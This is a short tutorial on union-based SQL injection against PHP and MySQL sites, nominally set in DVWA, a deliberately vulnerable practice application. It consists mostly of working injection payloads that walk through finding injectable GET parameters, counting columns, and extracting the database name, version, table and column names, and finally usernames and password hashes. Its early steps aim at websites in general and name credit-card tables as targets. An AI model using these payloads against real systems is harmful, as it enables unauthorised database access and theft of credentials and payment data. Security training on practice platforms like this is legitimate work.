Union Based Injection:

Technology: php
Database: Mysql

The main objective of this injection is to access database, of the website, by just given some malicious sql inputs in front end and get an access of the backend of the website i.e there database (Username/Password).

DVWA: Damnn Vulnerable Web Application:
A legal application, for security proffesionals to test their skills in some legal platforms.

Union Based Sql Injection:

Dvwa: Low Level

Step 1: Find GET Method on website

url:

?id=1
?pid=98765
?clothes=jean
?product=ilk

?Something=something

By trying, every possible option on website i.e search, links, submit, help etc

Step 2: Try or Check for Exception Handling

?id=2'

try inverted comma('), after value of get method

Result:
If any sql error is there, images missing, content corrupted etc
=> Website is vulnerable for SQL Injection


Step 3: Check No. of Column: "order by"


id=2' order by 1--+   ==> Normal result
id=2' order by 2--+   ==> Normal result
id=2' order by 3--+   ==> Normal result
id=2' order by 4--+   ==> Normal result
id=2' order by 5--+   ==> error

So, No. of column = 4

Step 4: Check for vulnerable column no. among (1,2,3,4)

id=2' union select 1,2,3,4--+

Result= 2/3/1/4

This will show some random number on screen, that no. will be vulnerable for further injection

Step 5: Get name of database

database()

id=2' union select 1,database(),3,4--+  

Step 6: Get version of database

version()

id=2' union select 1,version(),3,4--+  

Step 7: Get list of tables

id=2' union select 1,table_name,3,4 from information_schema.tables--+  

Result: Will list all tables and we have to select those table name, which seems to be having sensitive information

admin
users
login
passwrds
credit
debit
card_details
..
..
etc

Step 8: Get Columns of selected table

id=2' union select 1,column_name,3,4 from information_schema.columns where table_name="users"--+

Result: user,password

Step 9: Get Data of respected column names

id=2' union select 1,user,3,4 from users--+

Result: This

id=2' union select 1,passowrd,3,4 from users--+

md5 encrypted password.